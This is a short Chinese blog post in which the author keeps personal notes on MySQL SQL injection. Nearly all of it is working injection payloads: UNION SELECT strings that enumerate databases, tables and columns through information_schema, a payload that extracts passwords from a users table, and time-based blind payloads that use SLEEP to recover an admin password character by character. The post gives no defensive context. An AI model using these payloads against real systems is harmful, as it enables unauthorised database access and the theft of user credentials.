【原创】mysql注入

最近在搞mysql的注入的时候自己记录一下,留个纪念,以后忘记了可以看看。 

查询表

 
'and 1=2 union select 1,SCHEMA_NAME from information_schema.SCHEMATA limit 0,1-- 
'and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761-- 
 
 
查询字段
 
and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=表名的十六进制编码 and table_schema=数据库的16进制编码 limit 1,1-- 
 
and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=表名的十六进制编码 and table_schema=数据库的16进制编码-- 
 
查询数据
 
'and 1=2 union select 1,concat(password) from users limit 0,1-- 
 
基于时间的盲注
SELECT user FROM tbl_user where user='aaa'+0 and if((select 1 from tbl_user where user=“admin" and password='1234567'),sleep(5),1);
 
a'+0 UNION SELECT IF( ASCII( SUBSTRING(  PASSWORD , 1, 1 ) ) =50, SLEEP( 10 ) , NULL )  FROM admin WHERE username =  'admin'--
posted @ 2015-11-19 17:09  blck  阅读(184)  评论(0编辑  收藏  举报